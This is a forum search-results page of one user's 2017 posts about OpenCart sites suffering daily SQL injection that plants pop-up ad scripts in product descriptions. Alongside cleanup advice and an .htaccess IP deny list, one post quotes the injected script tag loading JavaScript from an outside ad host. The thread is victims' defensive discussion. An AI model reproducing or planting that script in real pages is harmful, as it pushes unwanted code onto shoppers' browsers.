Search found 14 matches


Re: Opencart SQL Injection Hack

This used to happen to my client twice a day, exactly as you describe. I found a way to prevent this from happening which I'm happy to share via Private Message. Have you checked to make sure you're running the latest version of your theme? Have you checked my earlier post regarding this SQL injectio...

  • Thu May 25, 2017 1:26 am
  • Replies 14
  • Views 8686
Re: Opencart SQL Injection Hack

And this is my latest .htaccess IP_ Lockout content, to keep 'em rangewise out for good! <Files *> order allow,deny allow from all deny from 5.77.34. deny from 37.59. deny from 37.128. deny from 46.101. deny from 46.161. deny from 46.229. deny from 47.90. deny from 51.255. deny from 63.243. deny fr...

  • Wed May 24, 2017 5:13 am
  • Replies 14
  • Views 8686
Re: Opencart SQL Injection Hack

This used to happen to my client twice a day, exactly as you describe. I found a way to prevent this from happening which I'm happy to share via Private Message. Have you checked to make sure you're running the latest version of your theme? Have you checked my earlier post regarding this SQL injection...

  • Wed May 24, 2017 5:03 am
  • Replies 14
  • Views 8686
Re: Journal Theme Security Bug ( SQL Injection )

sims wrote:
Mon May 01, 2017 8:00 am
Hi Rhys
Thanks for the reply, sounds like we need to compare notes! as I have a reasonable idea how to block this now

I sent you a PM
Hi Sims,
I've sent you a PM with my findings. It's stuck in my outbox so not sure if it's bugged - have you received it?
Thanks
Rhys

  • Mon May 01, 2017 8:28 am
  • Replies 13
  • Views 3737
Re: Journal Theme Security Bug ( SQL Injection )

Yes Sims, that's very similar, just different URLs. I found a way to stop that from being injected but it causes a small error on the site. I fear publishing the fix would compromise my client's site. Wondering how I can provide this information to genuine Opencart admins.

  • Mon May 01, 2017 6:51 am
  • Replies 13
  • Views 3737
Re: Journal Theme Security Bug ( SQL Injection )

I don't believe this topic should remain solely with Journal, it should still be discussed here also. I don't see any negative reasons not to share this information with the community?

  • Mon May 01, 2017 5:56 am
  • Replies 13
  • Views 3737
Re: Journal Theme Security Bug ( SQL Injection )

I have also found the journal theme to have a vulnerability to SQL injections. Somehow the injection is able to inject a JavaScript into the product description forcing popup websites to customers viewing the description. I've managed to stop the injection but cannot provide information yet for secu...

  • Mon May 01, 2017 5:31 am
  • Replies 13
  • Views 3737
Re: OC 2.3.0.2 SQL Injection?

Gentlemen, this is what I used and it's prevented the SQL injection so far, hope it works for you also.

viewtopic.php?t=115388

Thanks
Rhys

  • Sat Apr 22, 2017 2:14 am
  • Replies 18
  • Views 4750
Re: OC 2.3.0.2 SQL Injection?

If you haven't already, change your passwords for all admin users. Check your files on your server have not been modified by comparing against a clean download. Look through your web server logs for anything suspicious. Good advice, I replace the files so quickly to get the website functioning corre...

  • Wed Apr 19, 2017 2:29 pm
  • Replies 18
  • Views 4750
Re: OC 2.3.0.2 SQL Injection?

Did you really kill/delete/remove each entire subdirectory, then upload the entire clean subdirectory again, containing only what should be there by default? Or did you just overwrite the existing subdirectory content, without checking first if additional files possibly exist? But this would no...

  • Wed Apr 19, 2017 2:21 pm
  • Replies 18
  • Views 4750
Re: OC 2.3.0.2 SQL Injection?

If you haven't already, change your passwords for all admin users. Check your files on your server have not been modified by comparing against a clean download. Look through your web server logs for anything suspicious. Good advice, I replace the files so quickly to get the website functioning corre...

  • Mon Apr 17, 2017 6:45 pm
  • Replies 18
  • Views 4750
OC 2.3.0.2 SQL Injection?

I have a client running OC 2.3.0.2 and there seems to be a SQL injection occurring on a daily basis. The Product & Category description seems to include the following code: <script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></sc...

  • Sun Apr 16, 2017 9:15 pm
  • Replies 18
  • Views 4750
Re: OC 2.2.0.0 SQL injection attack?

Unfortunately I also have a client who was hacked by these lowlifes. I had to rebuild the site and restore everything minus the product descriptions which held the dodgy pop-up scripts. I managed to lock down most of the files including Json.php to 444 so they couldn't write to it, so far so good. ...

  • Fri Apr 07, 2017 6:47 am
  • Replies 9
  • Views 5528
Fixed text top left of site

Good evening, I'm trying to locate why I have a strange line of text displaying on the top left of my site (picture attached).
I've done some digging and I believe it's a browser check but wanted to run it by the community before editing.
Has anyone seen this before?

Thanks
Rhys

  • Wed Mar 22, 2017 4:19 am
  • Replies 0
  • Views 351
